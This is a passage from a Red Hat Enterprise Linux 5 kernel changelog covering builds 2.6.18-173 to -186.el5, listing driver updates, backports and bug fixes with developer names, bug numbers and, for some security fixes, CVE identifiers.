Milburn) [531488]\n- [scsi] bnx2i: additional fixes for rhel5.5 update (Mike Christie) [517378]\n- [misc] hpilo: fix build warning in ilo_isr (Tony Camuso) [515010]\n- [scsi] qla2xxx: add AER support (Rob Evers) [513927]\n- [x86] relocate initramfs so we can increase vmalloc space (Neil Horman) [499253]\n- [mm] memory mapped files not updating timestamps (Peter Staubach) [452129]\n[2.6.18-186.el5]\n- [net] emergency route cache flushing fixes (Thomas Graf) [545663] {CVE-2009-4272}\n- [fs] fasync: split 'fasync_helper()' into separate add/remove functions (Danny Feng) [548657] {CVE-2009-4141}\n- [scsi] qla2xxx: NPIV vport management pseudofiles are world writable (Tom Coughlan) [537318] {CVE-2009-3556}\n- [net] ipv6: fix ipv6_hop_jumbo remote system crash (Amerigo Wang) [548643] {CVE-2007-4567}\n- [net] e1000e: fix broken wol (Andy Gospodarek) [557974]\n- [net] r8169: add missing hunk from frame length filtering fix (Jarod Wilson) [552438]\n[2.6.18-185.el5]\n- [net] e1000e: fix rx length check errors (Amerigo Wang) [551223] {CVE-2009-4538}\n- [net] e1000: fix rx length check errors (Neil Horman) [552138] {CVE-2009-4536}\n- [net] r8169: improved frame length filtering (Neil Horman) [550915] {CVE-2009-4537}\n- kabi: fix dma_async_register symbol move (Jarod Wilson) [526342]\n- [kabi] add {napi,vlan}_gro_receive and intel dca symbols (Jon Masters) [526342]\n- Revert: amd64_edac: fix access to pci conf space type 1 (Jarod Wilson) [479070]\n[2.6.18-184.el5]\n- [scsi] lpfc: Update lpfc to version 8.2.0.63 driver release (Rob Evers) [549763]\n- [scsi] lpfc: Fix single SCSI buffer not handled on SLI4 (Rob Evers) [549763]\n- [scsi] lpfc: Fix Dead FCF not triggering discovery others (Rob Evers) [549763]\n- [scsi] lpfc: Fix vport->fc_flag set outside of lock fail (Rob Evers) [549763]\n- [scsi] lpfc: Fix processing of failed read fcf record (Rob Evers) [549763]\n- [scsi] lpfc: Fix fc header seq_count checks (Rob Evers) [549763]\n- [scsi] lpfc: Update to version 8.2.0.62 driver release (Rob Evers) [549763]\n- [scsi] lpfc: Fix hbq buff only for sli4 (Rob Evers) [549763]\n- [scsi] lpfc: Fix hbq buff adds to receive queue (Rob Evers) [549763]\n- [scsi] lpfc: Fix multi-frame sequence response frames (Rob Evers) [549763]\n- [scsi] lpfc: Fix adapter reset and off/online stress test (Rob Evers) [549763]\n- [scsi] lpfc: Update to version 8.2.0.61 driver release (Rob Evers) [549763]\n- [scsi] lpfc: Fix vport register VPI after devloss timeout (Rob Evers) [549763]\n- [scsi] lpfc: Fix crash during unload and sli4 abort cmd (Rob Evers) [549763]\n- [scsi] lpfc: Blocked all SCSI I/O requests from midlayer (Rob Evers) [549763]\n- [scsi] lpfc: Made TigerShark set up and use single FCP EQ (Rob Evers) [549763]\n- [scsi] lpfc: Update to 8.2.0.60 driver release (Rob Evers) [549763]\n- [scsi] lpfc: Fix vport not logging out when being deleted (Rob Evers) [549763]\n- [net] fixup problems with vlans and bonding (Andy Gospodarek) [526976]\n- [net] ixgbe: upstream update to include 82599-KR support (Andy Gospodarek) [513707]\n- [net] enic: update to upstream version 1.1.0.241a (Andy Gospodarek) [550148]\n- [net] be2net: multiple bug fixes (Ivan Vecera) [549460]\n- [net] virtio_net: fix tx wakeup race condition (Herbert Xu) [524651]\n- [net] add send/receive tracepoints (Neil Horman) [475457]\n- [iscsi] fix install panic w/xen iSCSI boot device (Miroslav Rezanina) [512991]\n- Revert: [mm] SRAT and NUMA fixes for span and/or is disc (Larry Woodman) [474097]\n- [misc] oprofile support for nehalme ep processors (John Villalovos) [498624]\n- [scsi] fix duplicate libiscsi symbol and kabi warnings (Jarod Wilson) [515284]\n- [edac] amd64_edac: fix access to pci conf space type 1 (Bhavna Sarathy) [479070]\n- [misc] do not evaluate WARN_ON condition twice (Hendrik Brueckner) [548653]\n- [xen] fix cpu frequency scaling on Intel procs (Christopher Lalancette) [553324]\n- [xen] passthrough MSI-X mask bit acceleration V3 (Don Dugger) [537734]\n- [xen] change interface of hvm_mmio_access V3 (Don Dugger) [537734]\n- [xen] fix msix table fixmap allocation V3 (Don Dugger) [537734]\n[2.6.18-183.el5]\n- [kabi] add scsi_dma_{,un}map (Jon Masters) [533489]\n- [kabi] add scsi_nl_{send_vendor_msg,{add,remove}_driver} (Jon Masters) [515812]\n- [kabi] add do_settimeofday and __user_walk_fd (Jon Masters) [486205]\n- [kabi] add pci_domain_nr (Jon Masters) [450121]\n- [sound] alsa hda driver update for rhel5.5 (Jaroslav Kysela) [525390]\n- Revert: [pci] avoid disabling acpi to use non-core PCI (Mauro Carvalho Chehab) [504330 547898]\n- [net] wireless: fix build when using O=objdir (John Linville) [546712]\n- [pci] remove msi-x vector allocation limitation (Stefan Assmann) [531266]\n- [net] vxge: avoid netpollNAPI race (Michal Schmidt) [453683]\n- [scsi] update fcoe for rhel5.5 (Mike Christie) [526259]\n- [net] update tg3 driver to version 3.100 (John Feeney) [515312]\n- [block] fix rcu accesses in partition statistics code (Jerome Marchand) [493517]\n- [pci] enable acs p2p upstream forwarding (Chris Wright) [518305]\n- [net] e1000e: support for 82567V-3 and MTU fixes (Andy Gospodarek) [513706]\n- [pci] aer hest disable support (Prarit Bhargava) [547762]\n- [pci] aer hest firmware first support (Prarit Bhargava) [547762]\n- [block] iosched: fix batching fairness (Jeff Moyer) [462472]\n- [block] iosched: reset batch for ordered requests (Jeff Moyer) [462472]\n- [net] bonding: allow arp_ip_targets on separate vlan from bond device (Andy Gospodarek) [526976]\n- [firewire] ohci: handle receive packets with zero data (Jay Fenlason) [547242] {CVE-2009-4138}\n- [drm] intel: add IRONLAKE support to AGP/DRM drivers (Dave Airlie) [547908]\n- [xen] mask AMDs Node ID MSR (Andrew Jones) [547518]\n- Revert: [xen] fix msi-x table fixmap allocation (Don Dugger) [537734]\n- Revert: [xen] change interface of hvm_mmio_access (Don Dugger) [537734]\n- Revert: [xen] passthrough msi-x mask bit acceleration (Don Dugger) [537734]\n[2.6.18-182.el5]\n- [x86_64] disable vsyscall in kvm guests (Glauber Costa) [542612]\n- [fs] ext3: replace lock_super with explicit resize lock (Eric Sandeen) [525100]\n- [net] bonding: add debug module option (Jiri Pirko) [546624]\n- [fs] respect flag in do_coredump (Danny Feng) [544189] {CVE-2009-4036}\n- [md] fix a race in dm-raid1 (Mikulas Patocka) [502927]\n- [misc] timer: add tracepoints (Jason Baron) [534178]\n- [net] ipv4: fix possible invalid memory access (Prarit Bhargava) [541213]\n- [x86] support AMD L3 cache index disable (Bhavna Sarathy) [517586]\n- [scsi] add emc clariion support to scsi_dh modules (Mike Christie) [437107]\n- [infiniband] fix iser sg aligment handling (Mike Christie) [540686]\n- [scsi] qla2xxx: CT passthrough and link data rate fixes (Marcus Barrow) [543057]\n- [scsi] qla2xxx: update to 8.03.01.04.05.05-k (Marcus Barrow) [542834]\n- [net] s2io: update driver to current upstream version (Michal Schmidt) [513942]\n- [ia64] export cpu_core_map (like i386 and x86_64) (Michal Schmidt) [448856]\n- [net] sfc: additional fixes for rhel5.5 (Michal Schmidt) [448856]\n- [redhat] configs: enable building of the sfc driver (Michal Schmidt) [448856]\n- [net] sfc: add the sfc (Solarflare) driver (Michal Schmidt) [448856]\n- [net] vxge: driver update to 2.0.6 (Michal Schmidt) [453683]\n- [scsi] ibmvscsi: upstream multipath enhancements for 5.5 (Kevin Monroe) [512203]\n[2.6.18-181.el5]\n- [vfs] DIO write returns -EIO on try_to_release_page fail (Jeff Moyer) [461100]\n- [wireless] enable use of internal regulatory database (John Linville) [546712]\n- [wireless] add wireless regulatory rules database (John Linville) [546712]\n- [wireless] use internal regulatory database infrastructure (John Linville) [546712]\n- [wireless] update old static regulatory domain rules (John Linville) [543723]\n- [net] wireless: report reasonable bitrate for 802.11n (John Linville) [546281]\n- [net] mac80211: report correct signal for non-dBm values (John Linville) [545899]\n- [net] wireless: kill some warning spam (John Linville) [545121]\n- [net] mac80211: avoid uninit ptr deref in ieee80211 (John Linville) [545121]\n- [net] wireless: avoid deadlock when enabling rfkill (John Linville) [542593]\n- [wireless] configuration changes for updates (John Linville) [456943 474328 514661 516859]\n- [net] ath9k: backport driver from 2.6.32 (John Linville) [456943]\n- [net] wireless: updates of mac80211 etc from 2.6.32 (John Linville) [474328 514661 516859]\n- [net] wireless support updates from 2.6.32 (John Linville) [456943 474328 514661 516859]\n- [net] bnx2: update to version 2.0.2 (John Feeney) [517377]\n- [usb] support lexar expresscard (Pete Zaitcev) [511374]\n- [net] cnic: update driver for RHEL5.5 (Stanislaw Gruszka) [517378]\n- [net] bnx2x: update to 1.52.1-5 (Stanislaw Gruszka) [515716 522600]\n- [net] bnx2x: add mdio support (Stanislaw Gruszka) [515716 522600]\n- [net] bnx2x: add firmware version 5.2.7.0 (Stanislaw Gruszka) [515716 522600]\n- [net] bnx2x: update to 1.52.1 (Stanislaw Gruszka) [515716 522600]\n- [fs] make NR_OPEN tunable (Eric Sandeen) [507159]\n- [net] mdio: add mdio module from upstream (Michal Schmidt) [448856]\n- [net] ethtool: add more defines for mdio to use (Michal Schmidt) [448856]\n- [pci] add and export pci_clear_master (Michal Schmidt) [448856]\n- [mm] SRAT and NUMA fixes for span and/or is discontig mem (Larry Woodman) [474097]\n- [fs] eventfd: remove fput call from possible IRQ context (Jeff Moyer) [493101]\n- [fs] eventfd: kaio integration fix (Jeff Moyer) [493101]\n- [fs] eventfd: sanitize anon_inode_getfd() (Jeff Moyer) [493101]\n(Jeff Moyer) [493101]\n- [fs] eventfd: clean compile when CONFIG_EVENTFD=n (Jeff Moyer) [493101]\n- [s390] wire up signald, timerfd and eventfd syscalls (Jeff Moyer) [493101]\n- [fs] eventfd: use waitqueue lock (Jeff Moyer) [493101]\n- [ppc] wire up eventfd syscalls (Jeff Moyer) [493101]\n- [ia64] wire up {signal, timer, event}fd syscalls (Jeff Moyer) [493101]\n- [fs] aio: KAIO eventfd support example (Jeff Moyer) [493101]\n- [fs] eventfd: wire up x86 arches (Jeff Moyer) [493101]\n- [fs] add eventfd core (Jeff Moyer) [493101]\n- [net] r8169: update to latest upstream for rhel5.5 (Ivan Vecera) [540582]\n- [net] benet: update driver to latest upstream for rhel5.5 (Ivan Vecera) [515269]\n- [net] e1000e: update and fix WOL issues (Andy Gospodarek) [513706 513930 517593 531086]\n- [net] e1000: update to latest upstream for rhel5.5 (Dean Nelson) [515524]\n- [net] mlx4: update to recent version with SRIOV support (Doug Ledford) [503113 512162 520674 527499 529396 534158]\n- [md] raid: deal with soft lockups during resync (Doug Ledford) [501075]\n- [x86] amd: add node ID MSR support (Bhavna Sarathy) [530181]\n- [net] ipv4: fix an unexpectedly freed skb in tcp (Amerigo Wang) [546402]\n[2.6.18-180.el5]\n- [fs] ext4: fix insufficient checks in EXT4_IOC_MOVE_EXT (Eric Sandeen) [546105] {CVE-2009-4131}\n- [fs] fix possible inode corruption on unlock (Eric Sandeen) [545612]\n- [fs] xfs: fix fallocate error return sign (Eric Sandeen) [544349]\n- [net] bnx2: fix frags index (Flavio Leitner) [546326]\n- [pci] implement public pci_ioremap_bar function (Prarit Bhargava) [546244]\n- [trace] add coredump tracepoint (Masami Hiramatsu) [517115]\n- [trace] add signal tracepoints (Masami Hiramatsu) [517121]\n- [trace] add itimer tracepoints (Jason Baron) [534178]\n- [gfs2] make O_APPEND behave as expected (Steven Whitehouse) [544342]\n- [gfs2] fix rename locking issue (Steven Whitehouse) [538484]\n- [usb] add quirk for iso on amd sb800 (Pete Zaitcev) [537433]\n- [mm] add kernel pagefault tracepoint for x86 & x86_64 (Larry Woodman) [517133]\n- [ia64] dma_get_required_mask altix workaround (George Beshers) [517192]\n- [misc] sysctl: require CAP_SYS_RAWIO to set mmap_min_addr (Amerigo Wang) [534018]\n- [pci] intel-iommu: no pagetable validate in passthru mode (Don Dutile) [518103]\n- [pci] intel-iommu: set dmar_disabled when DMAR at zero (Don Dutile) [516811 518103]\n- [pci] dmar: rhsa entry decode (Don Dutile) [516811 518103]\n- [pci] intel-iommu: add hot (un)plug support (Don Dutile) [516811 518103]\n- [pci] inte-iommu: alloc_coherent obey coherent_dma_mask (Don Dutile) [516811 518103]\n- [pci] dmar: check for DMAR at zero BIOS error earlier (Don Dutile) [516811 518103]\n- [pci] intel-iommu: fix for isoch dmar w/no tlb space (Don Dutile) [516811 518103]\n- [pci] intel-iommu: add 2.6.32-rc4 sw and hw pass-through (Don Dutile) [516811 518103]\n- [pci] intel-iommu: IOTLB flushing mods & ATSR support (Don Dutile) [516811 518103]\n- [aio] implement request batching (Jeff Moyer) [532769]\n- [net] netxen: further p3 updates for rhel5.5 (Marcus Barrow) [542746]\n- [net] netxen: driver updates from 2.6.32 (Marcus Barrow) [516833]\n- [net] netxen: driver updates from 2.6.31 (Marcus Barrow) [516833]\n- [xen] passthrough msi-x mask bit acceleration (Don Dugger) [537734]\n- [xen] change interface of hvm_mmio_access (Don Dugger) [537734]\n- [xen] fix msi-x table fixmap allocation (Don Dugger) [537734]\n- [xen] fix w/sata set to ide combined mode on amd (Bhavna Sarathy) [544021]\n- [xen] domU irq ratelimiting (Don Dugger) [524747]\n[2.6.18-179.el5]\n- [scsi] st: display current settings of option bits (Tom Coughlan) [501030]\n- [pci] AER: prevent errors being reported multiple times (Prarit Bhargava) [544923]\n- [cifs] NULL out pointers when chasing DFS referrals (Jeff Layton) [544417]\n- [fbfront] xenfb: dont recreate thread on every restore (Christopher Lalancette) [541325]\n- [net] igb: update igb driver to support barton hills (Stefan Assmann) [513710]\n- [fs] hfs: fix a potential buffer overflow (Amerigo Wang) [540741] {CVE-2009-4020}\n- [fuse] prevent fuse_put_request on invalid pointer (Danny Feng) [538737] {CVE-2009-4021}\n- [scsi] lpfc: update version from 8.2.0.58 to 8.2.0.59 (Rob Evers) [529244]\n- [scsi] lpfc: update version from 8.2.0.55 to 8.2.0.58 (Rob Evers) [516541 529244]\n- [scsi] lpfc: update version from 8.2.0.52 to 8.2.0.55 (Rob Evers) [529244]\n- [scsi] pmcraid: minor driver update for rhel5.5 (Rob Evers) [529979]\n- [scsi] add pmcraid driver (Rob Evers) [529979]\n- [scsi] bfa: brocade bfa fibre-channel/fcoe driver (Rob Evers) [475695]\n- [md] support origin size < chunk size (Mikulas Patocka) [502965]\n- [md] lock snapshot while reading status (Mikulas Patocka) [543307]\n- [md] fix deadlock in device mapper multipath (Mikulas Patocka) [543270]\n- [md] raid5: mark cancelled readahead bios with -EIO (Eric Sandeen) [512552]\n- [fs] ext2: convert to new aops (Josef Bacik) [513136]\n- [fs] jbd: fix race in slab creation/deletion (Josef Bacik) [496847]\n- [net] enic: update to upstream version 1.1.0.100 (Andy Gospodarek) [519086]\n- [scsi] megaraid: make driver legacy I/O port free (Tomas Henzl) [515863]\n- [scsi] megaraid: upgrade to version 4.17-RH1 (Tomas Henzl) [518243]\n- [net] ipvs: synchronize closing of connections (Danny Feng) [492942]\n- [fs] dlm: fix connection close handling (David Teigland) [521093]\n- [hwmon] add support for syleus chip to fschmd driver (Dean Nelson) [513101]\n- [s390] dasd: fix DIAG access for read-only devices (Hendrik Brueckner) [537859]\n- [acpi] backport support for ACPI 4.0 power metering (Matthew Garrett) [514923]\n- [scsi] mpt2sas: use selected regions (Tomas Henzl) [516702]\n- [scsi] mpt2sas: upgrade to 01.101.06.00 (Tomas Henzl) [516702]\n- [block] blktrace: only tear down our own debug/block (Eric Sandeen) [498489]\n- Revert: [scsi] fix inconsistent usage of max_lun (David Milburn) [531488]\n[2.6.18-178.el5]\n- [x86] fix stale data in shared_cpu_map cpumasks (Prarit Bhargava) [541953]\n- [mm] call vfs_check_frozen after unlocking the spinlock (Amerigo Wang) [541956]\n- [md] fix data corruption with different chunksizes (Mikulas Patocka) [210490]\n- [md] fix snapshot crash on invalidation (Mikulas Patocka) [461506]\n- [net] cxgb3: fix port index issue (Doug Ledford) [516948]\n- [net] cxgb3: correct hex/decimal error (Doug Ledford) [516948]\n- [net] mlx4_en: add a pci id table (Doug Ledford) [508770]\n- [infiniband] null out skb pointers on error (Doug Ledford) [531784]\n- [infiniband] init neigh->dgid.raw on bonding events (Doug Ledford) [538067]\n- [nfs] add an nfsiod workqueue (Ian Kent) [489931]\n- [nfs] nfsiod: ensure the asynchronous RPC calls complete (Ian Kent) [489931]\n- [nfs] sunrpc: allow rpc_release() CB run on another workq (Ian Kent) [489931]\n- [nfs] fix a deadlock with lazy umount -2 (Ian Kent) [489931]\n- [nfs] fix a deadlock with lazy umount (Ian Kent) [489931]\n- [fs] ext3/4: free journal buffers (Eric Sandeen) [506217]\n- [net] resolve issues with vlan creation and filtering (Andy Gospodarek) [521345]\n- [scsi] stex: update driver for RHEL-5.5 (David Milburn) [516881]\n- [scsi] be2iscsi: add driver to generic config (Mike Christie) [515284]\n- [scsi] add be2iscsi driver (Mike Christie) [515284]\n- [fs] ext4: update to 2.6.32 codebase (Eric Sandeen) [528054]\n- [scsi] disable state transition from OFFLINE to RUNNING (Takahiro Yasui) [516934]\n- [scsi] fusion: update mpt driver to 3.4.13rh (Tomas Henzl) [516710]\n- [net] gro: fix illegal merging of trailer trash (Herbert Xu) [537876]\n[2.6.18-177.el5]\n- [scsi] gdth: prevent negative offsets in ioctl (Amerigo Wang) [539421] {CVE-2009-3080}\n- [net] ixgbe: add and enable CONFIG_IXGBE_DCA (Andy Gospodarek) [514306]\n- [net] ixgbe: update to upstream version 2.0.44-k2 (Andy Gospodarek) [513707 514306 516699]\n- [cifs] duplicate data on appending to some samba servers (Jeff Layton) [500838]\n- [s390] kernel: fix single stepping on svc0 (Hendrik Brueckner) [540527]\n- [fs] gfs2: fix glock ref count issues (Steven Whitehouse) [539240]\n- [vbd] xen: fix crash after ballooning (Christopher Lalancette) [540811]\n- [block] cfq-iosched: get rid of cfqq hash (Jeff Moyer) [427709 448130 456181]\n- [scsi] devinfo update for hitachi entries for RHEL5.5 (Takahiro Yasui) [430631]\n- [net] call cond_resched in rt_run_flush (Amerigo Wang) [517588]\n- [cifs] update cifs version number (Jeff Layton) [500838]\n- [cifs] avoid invalid kfree in cifs_get_tcp_session (Jeff Layton) [500838]\n- [cifs] fix broken mounts when a SSH tunnel is used (Jeff Layton) [500838]\n- [cifs] fix memory leak in ntlmv2 hash calculation (Jeff Layton) [500838]\n- [cifs] fix potential NULL deref in parse_DFS_referrals (Jeff Layton) [500838]\n- [cifs] fix read buffer overflow (Jeff Layton) [500838]\n- [cifs] free nativeFileSystem before allocating new one (Jeff Layton) [500838]\n- [cifs] add addr= mount option alias for ip= (Jeff Layton) [500838]\n- [cifs] copy struct *after* setting port, not before (Jeff Layton) [500838]\n- [cifs] fix artificial limit on reading symlinks (Jeff Layton) [500838]\n- [scsi] megaraid: fix sas permissions in sysfs (Casey Dahlin) [537313] {CVE-2009-3889 CVE-2009-3939}\n- [cpufreq] avoid playing with cpus_allowed in powernow-k8 (Alex Chiang) [523505]\n- [cpufreq] change cpu freq arrays to per_cpu variables (Alex Chiang) [523505]\n- [cpufreq] powernow-k8: get drv data for correct cpu (Alex Chiang) [523505]\n- [cpufreq] x86: change NR_CPUS arrays in powernow-k8 (Alex Chiang) [523505]\n- [cifs] fix error handling in mount-time dfs referral code (Jeff Layton) [513410]\n- [cifs] add loop check when mounting dfs tree (Jeff Layton) [513410]\n- [cifs] fix some build warnings (Jeff Layton) [513410]\n- [cifs] fix build when dfs support not enabled (Jeff Layton) [513410]\n- [cifs] remote dfs root support (Jeff Layton) [513410]\n- [cifs] enable dfs submounts to handle remote referrals (Jeff Layton) [513410]\n- [edac] i3200_edac: backport driver to RHEL 5.5 (Mauro Carvalho Chehab) [469976]\n- [edac] add upstream i3200_edac driver (Mauro Carvalho Chehab) [469976]\n- [cifs] no CIFSGetSrvInodeNumber in is_path_accessible (Jeff Layton) [529431]\n- [block] blktrace: correctly record block to and from devs (Jason Baron) [515551]\n- [sched] enable CONFIG_DETECT_HUNG_TASK support (Amerigo Wang) [506059]\n- [xen] fix SRAT check for discontiguous memory (Christopher Lalancette) [519225]\n- [xen] implement fully preemptible page table teardown (Christopher Lalancette) [510037]\n[2.6.18-176.el5]\n- [xen] mask extended topo cpuid feature (Andrew Jones ) [533292]\n- [fs] pipe.c null pointer dereference (Jeff Moyer ) [530939] {CVE-2009-3547}\n- [xen] cd-rom drive does not recognize new media (Miroslav Rezanina ) [221676]\n- [nfs] fix stale nfs_fattr passed to nfs_readdir_lookup (Harshula Jayasuriya ) [531016]\n- [spec] s390: enable kernel module signing (Don Zickus ) [483665]\n- [nfs] bring nfs4acl into line with mainline code (Jeff Layton ) [479870 530575]\n- [ia64] kdump: restore registers in the stack on init (Takao Indoh ) [515753]\n- [nfs] nfsd4: do exact check of attribute specified (Jeff Layton ) [512361]\n- [net] igb: add support for 82576ns serdes adapter (Stefan Assmann ) [517063]\n- [s390] zfcp_scsi: dynamic queue depth adjustment param (Pete Zaitcev ) [508355]\n- [scsi] fix inconsistent usage of max lun (David Milburn ) [531488]\n- [ipmi] fix ipmi_si modprobe hang (Tony Camuso ) [507402]\n- [x86] kvm: dont ask HV for tsc khz if not using kvmclock (Glauber Costa ) [531268]\n- [net] qlge: updates and fixes for RHEL-5.5 (Marcus Barrow ) [519453]\n- [net] igb: fix kexec with igb controller (Stefan Assmann ) [527424]\n- [net] qlge: fix crash with kvm guest device passthru (Marcus Barrow ) [507689]\n- [misc] hpilo: add polling mechanism (Tony Camuso ) [515010]\n- [misc] hpilo: add interrupt handler (Tony Camuso ) [515010]\n- [misc] hpilo: staging for interrupt handling (Tony Camuso ) [515010]\n- [edac] amd64_edac: enable driver in kernel config (Bhavna Sarathy ) [479070]\n- [edac] amd64_edac: remove early hardware probe (Bhavna Sarathy ) [479070]\n- [edac] amd64_edac: detect ddr3 support (Bhavna Sarathy ) [479070]\n- [edac] amd64_edac: add ddr3 support (Bhavna Sarathy ) [479070]\n- [edac] add amd64_edac driver (Bhavna Sarathy ) [479070]\n- [net] igb: set vf rlpml must take vlan tag into account (Don Dugger ) [515602]\n- [misc] hibernate: increase timeout (Matthew Garrett ) [507331]\n- [nfs] make sure dprintk() macro works everywhere (Jeff Layton ) [532701]\n- [acpi] include core wmi support and dell-wmi driver (Matthew Garrett ) [516623]\n- [powerpc] fix to handle SLB resize during migration (Kevin Monroe ) [524112]\n- [mm] oom killer output should display UID (Larry Woodman ) [520419]\n- [net] fix race in data receive/select (Amerigo Wang ) [509866]\n- [net] augment raw_send_hdrinc to validate ihl in user hdr (Neil Horman ) [500924]\n- [i2c] include support for Hudson-2 SMBus controller (Stanislaw Gruszka ) [515125]\n- [net] bonding: introduce primary_reselect option (Jiri Pirko ) [471532]\n- [net] bonding: ab_arp use std active slave select code (Jiri Pirko ) [471532]\n- [net] use netlink notifications to track neighbour states (Danny Feng ) [516589]\n- [net] introduce generic function __neigh_notify (Danny Feng ) [516589]\n- [fs] skip inodes w/o pages to free in drop_pagecache_sb (Larry Woodman ) [528070]\n[2.6.18-175.el5]\n- [net] bnx2x: add support for bcm8727 phy (Stanislaw Gruszka ) [515716]\n- [net] sched: fix panic in bnx2_poll_work (John Feeney ) [526481]\n- [acpi] prevent duplicate dirs in /proc/acpi/processor (Matthew Garrett ) [537395]\n- [mm] conditional flush in flush_all_zero_pkmaps (Eric Sandeen ) [484683]\n- [fs] ecryptfs: copy lower attrs before dentry instantiate (Eric Sandeen ) [489774]\n- [ppc] fix compile warnings in eeh code (Prarit Bhargava ) [538407]\n- [md] multiple device failure renders dm-raid1 unfixable (Jonathan E Brassow ) [498532]\n- [scsi] ibmvscsi: FCoCEE NPIV support (Steve Best ) [512192]\n- [fs] gfs2: fix potential race in glock code (Steven Whitehouse ) [498976]\n- [kvm] balloon driver for guests (Peter Bogdanovic ) [522629]\n- [sctp] assign tsns earlier to avoid reordering (Neil Horman ) [517504]\n- [x86] fix boot crash with < 8-core AMD Magny-cours system (Bhavna Sarathy) [522215]\n- [x86] support amd magny-cours power-aware scheduler fix (Bhavna Sarathy ) [513685]\n- [x86] cpu: upstream cache fixes needed for amd m-c (Bhavna Sarathy ) [526315]\n- [x86_64] set proc id and core id before calling fixup_dcm (Bhavna Sarathy) [526315]\n- [x86] disable NMI watchdog on CPU remove (Prarit Bhargava ) [532514]\n- [nfsd] dont allow setting ctime over v4 (Jeff Layton ) [497909]\n- [acpi] bm_check and bm_control update (Luming Yu ) [509422]\n- [x86_64] amd: iommu system management erratum 63 fix (Bhavna Sarathy ) [531469]\n- [net] bnx2i/cnic: update driver version for RHEL5.5 (Mike Christie ) [516233]\n- [x86] fix L1 cache by adding missing break (Bhavna Sarathy ) [526770]\n- [x86] amd: fix hot plug cpu issue on 32-bit magny-cours (Bhavna Sarathy ) [526770]\n- [acpi] disable ARB_DISABLE on platforms where not needed (Luming Yu ) [509422]\n- [s390] do not annotate cmdline as __initdata (Hendrik Brueckner ) [506898]\n- [x86_64] fix 32-bit process register leak (Amerigo Wang ) [526798]\n- [misc] dont call printk while crashing (Mauro Carvalho Chehab ) [497195]\n- [x86] mce_amd: fix up threshold_bank4 creation (Bhavna Sarathy ) [526315]\n- [pci] fix SR-IOV function dependency link problem (Don Dugger ) [503837]\n- [xen] fix numa on magny-cours systems (Bhavna Sarathy ) [526051]\n- [xen] add two HP ProLiant DMI quirks to the hypervisor (Paolo Bonzini ) [536677]\n- [xen] hook sched rebalance logic to opt_hardvirt (Christopher Lalancette ) [529271]\n- [xen] crank the correct stat in the scheduler (Christopher Lalancette ) [529271]\n- [xen] whitespace fixups in xen scheduler (Christopher Lalancette ) [529271]\n- [xen] fix crash with memory imbalance (Bhavna Sarathy ) [526785]\n[2.6.18-174.el5]\n- [fs] private dentry list to avoid dcache_lock contention (Lachlan McIlroy ) [526612]\n- [gfs2] drop rindex glock on grows (Benjamin Marzinski ) [482756]\n- [acpi] run events on cpu 0 (Matthew Garrett ) [485016]\n- [cpufreq] add option to avoid smi while calibrating (Matthew Garrett ) [513649]\n- [acpi] support physical cpu hotplug on x86_64 (Stefan Assmann ) [516999]\n- [scsi] qla2xxx: enable msi-x correctly on qlogic 2xxx series (Marcus Barrow ) [531593]\n- [apic] fix server c1e spurious lapic timer events (Bhavna Sarathy ) [519422]\n- [pci] aer: fix ppc64 compile - no msi support (Prarit Bhargava ) [514442 517093]\n- [pci] aer: config changes to enable aer support (Prarit Bhargava ) [514442 517093]\n- [pci] aer: fix NULL pointer in aer injection code (Prarit Bhargava ) [514442 517093]\n- [pci] aer: add domain support to aer_inject (Prarit Bhargava ) [514442 517093]\n- [pci] aer: backport acpi osc functions (Prarit Bhargava ) [517093]\n- [pci] aer: pcie support and compile fixes (Prarit Bhargava ) [517093]\n- [pci] aer: changes required to compile in RHEL5 (Prarit Bhargava ) [514442 517093]\n- [pci] aer: base aer driver support (Prarit Bhargava ) [514442 517093]\n- [kvm] use upstream kvm_get_tsc_khz (Glauber Costa ) [531025]\n- [cifs] turn oplock breaks into a workqueue job (Jeff Layton ) [531005]\n- [cifs] fix oplock request handling in posix codepath (Jeff Layton ) [531005]\n- [cifs] have cifsFileInfo hold an extra inode reference (Jeff Layton ) [531005]\n- [cifs] take GlobalSMBSes_lock as read-only (Jeff Layton ) [531005]\n- [cifs] remove cifsInodeInfo.oplockPending flag (Jeff Layton ) [531005]\n- [cifs] replace wrtPending with a real reference count (Jeff Layton ) [531005]\n- [cifs] clean up set_cifs_acl interfaces (Jeff Layton ) [531005]\n- [cifs] reorganize get_cifs_acl (Jeff Layton ) [531005]\n- [cifs] protect GlobalOplock_Q with its own spinlock (Jeff Layton ) [531005]\n- [scsi] qla2xxx: updates and fixes for RHEL-5.5 (Marcus Barrow ) [519447]\n- [net] vlan: silence multicast debug messages (Danny Feng ) [461442]\n- [fs] fix inode_table test in ext{2,3}_check_descriptors (Eric Sandeen ) [504797]\n- [net] netlink: fix typo in initialization (Jiri Pirko ) [527906]\n- [mm] prevent tmpfs from going readonly during oom kills (Larry Woodman ) [497257]\n- [x86] set cpu_llc_id on AMD CPUs (Bhavna Sarathy ) [513684]\n- [x86] fix up threshold_bank4 support on AMD Magny-cours (Bhavna Sarathy ) [513684]\n- [x86] fix up L3 cache information for AMD Magny-cours (Bhavna Sarathy ) [513684]\n- [x86] amd: fix CPU llc_shared_map information (Bhavna Sarathy ) [513684]\n- [fs] trim instantiated file blocks on write errors (Eric Sandeen ) [515529]\n- [s390] optimize storage key operations for anon pages (Hans-Joachim Picht ) [519977]\n- [net] cxgb3: bug fixes from latest upstream version (Doug Ledford ) [510818]\n- [misc] saner FASYNC handling on file close (Paolo Bonzini ) [510746]\n- [wireless] mac80211: fix reported wireless extensions version (John Linville ) [513430]\n- [mm] dont oomkill when hugepage alloc fails on node (Larry Woodman ) [498510]\n- [xen] iommu-amd: extend loop ctr for polling completion wait (Bhavna Sarathy ) [518474 526766]\n- [xen] iommu: add passthrough and no-intremap parameters (Bhavna Sarathy ) [518474 526766]\n- [xen] iommu: enable amd iommu debug at run-time (Bhavna Sarathy ) [518474 526766]\n- [xen] support interrupt remapping on M-C (Bhavna Sarathy ) [518474 526766]\n- [xen] iommu: move iommu_setup() to setup ioapic correctly (Bhavna Sarathy ) [518474 526766]\n[2.6.18-173.el5]\n- [acpi] thinkpad_acpi: disable ecnvram brightness on some (Matthew Garrett ) [522745]\n- [block] cfq-iosched: dont delay queue kick for merged req (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq-iosched: fix idling interfering with plugging (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq: separate merged cfqqs if they stop cooperating (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq: change the meaning of the cfqq_coop flag (Jeff Moyer ) [456181 448130 427709]\n- [block] cfq: merge cooperating cfq_queues (Jeff Moyer ) [456181 448130 